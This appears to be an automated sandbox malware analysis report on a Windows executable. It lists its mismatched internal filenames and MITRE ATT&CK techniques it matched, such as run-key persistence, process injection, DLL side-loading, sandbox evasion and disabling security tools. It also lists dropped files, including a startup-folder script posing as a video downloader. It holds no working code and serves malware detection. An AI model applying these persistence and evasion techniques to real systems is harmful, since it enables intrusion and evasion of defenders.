Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1959753041.0000000003247000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFmjetpfxwt.exe" vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000000.1654134437.0000000000DAB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCopmdttcydw.exeJ vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1959753041.00000000031EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2913496765.00000000055C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameWwvohnmgihu.dll" vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2911708889.0000000004045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWwvohnmgihu.dll" vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2909883947.000000000046A000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFmjetpfxwt.exe" vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2911708889.00000000041B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWwvohnmgihu.dll" vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2911324509.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWwvohnmgihu.dll" vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Binary or memory string: OriginalFilenameCopmdttcydw.exeJ vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\4kvideodownloaderplus.exe

C:\Users\user\AppData\Local\4kvideodownloaderplus.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4kvideodownloaderplus.vbs

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Function 06204A40 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Function 063EE330 Relevance: 3.1, Strings: 2, Instructions: 617
COMMON

Function 063EE320 Relevance: 2.7, Strings: 2, Instructions: 170
COMMON

Function 0630B8C0 Relevance: 7.7, Strings: 6, Instructions: 161
COMMON

Function 0630A610 Relevance: 4.2, Strings: 3, Instructions: 490
COMMON

Function 0630C2C8 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Function 06306B79 Relevance: 3.0, Strings: 2, Instructions: 484
COMMON

Function 062229D0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Function 06309CC0 Relevance: 2.8, Strings: 2, Instructions: 349
COMMON